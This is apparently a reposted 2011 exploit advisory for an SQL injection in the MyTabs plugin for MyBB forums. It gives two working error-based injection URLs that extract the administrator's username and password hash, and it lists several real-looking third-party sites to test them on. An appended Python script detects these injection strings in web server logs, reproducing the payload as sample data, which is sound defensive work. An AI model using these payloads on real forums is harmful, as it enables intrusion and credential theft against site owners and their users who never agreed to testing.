
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability


# Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Home : skidforums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com
# Date : 01 \ 08 \ 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Software Link : http://mods.mybb.com/view/mytabs
# Google dork : Use your mind kid ^_^ !

Vulnerability :


---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------

$~ Get the administrator's username (usually it has uid=1) ~

Code:
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count,concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

$~ Get the administrator's password ~

Code:
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count,concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

A few sites for you to test:
Code:
http://icanhazcookie.net
http://edcmania.com
http://livedown.us
......
Thanks all
Leader at J2TEAM. Website: https://j2team.dev/
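
Both requests above carry the injected SQL in the tab parameter of index.php, where a normal value is an integer (tab=1). The following Python script is an added example, not part of the original advisory or the plugin's code: it flags such requests in a web server access log. The combined log format, the constructed sample lines and the rule that legitimate tab values are short integers are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-log-format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Markers of the error-based technique in the advisory's requests
ERROR_BASED_RE = re.compile(
    r"information_schema|floor\s*\(\s*rand\s*\(|concat\s*\(|\bselect\b", re.I)

def classify_tab(target):
    """Return 'ok', 'non_integer' or 'sqli_error_based' for a request target."""
    # parse_qs percent-decodes each value and turns '+' into a space
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get("tab", [])
    verdict = "ok"
    for value in values:
        if re.fullmatch(r"\d{1,9}", value):   # assumption: tab ids are small integers
            continue
        if ERROR_BASED_RE.search(value):
            return "sqli_error_based"
        verdict = "non_integer"
    return verdict

def scan(log_lines):
    """Return (client_ip, verdict, target) for every suspicious request."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match is None:
            continue
        verdict = classify_tab(match.group("target"))
        if verdict != "ok":
            hits.append((line.split(" ", 1)[0], verdict, match.group("target")))
    return hits

# Constructed sample log lines (documentation IP ranges), not from a real server.
# The second target is the advisory's username request, percent-encoded.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2011:10:00:00 +0000] "GET /mybbpath/index.php?tab=2 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Aug/2011:10:00:05 +0000] "GET /mybbpath/index.php?tab=1%27%20and'
    '(select%201%20from(select%20count,concat((select%20username%20from%20mybb_users%20where'
    '%20uid=1),floor(Rand(0)*2))a%20from%20information_schema.tables%20group%20by%20a)b)--%20-'
    ' HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Aug/2011:10:00:09 +0000] "GET /mybbpath/index.php?tab=1%27 HTTP/1.1" 200 640',
    '192.0.2.10 - - [01/Aug/2011:10:00:12 +0000] "GET /mybbpath/index.php HTTP/1.1" 200 5090',
]

if __name__ == "__main__":
    for ip, verdict, target in scan(SAMPLE_LOG):
        print(ip, verdict, target[:60])
```

A non_integer hit such as a lone quote is often the probe that precedes the full query, so both verdicts are worth correlating by client address.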

1 comment

  1. Why don't you make a blog for me like yours? :(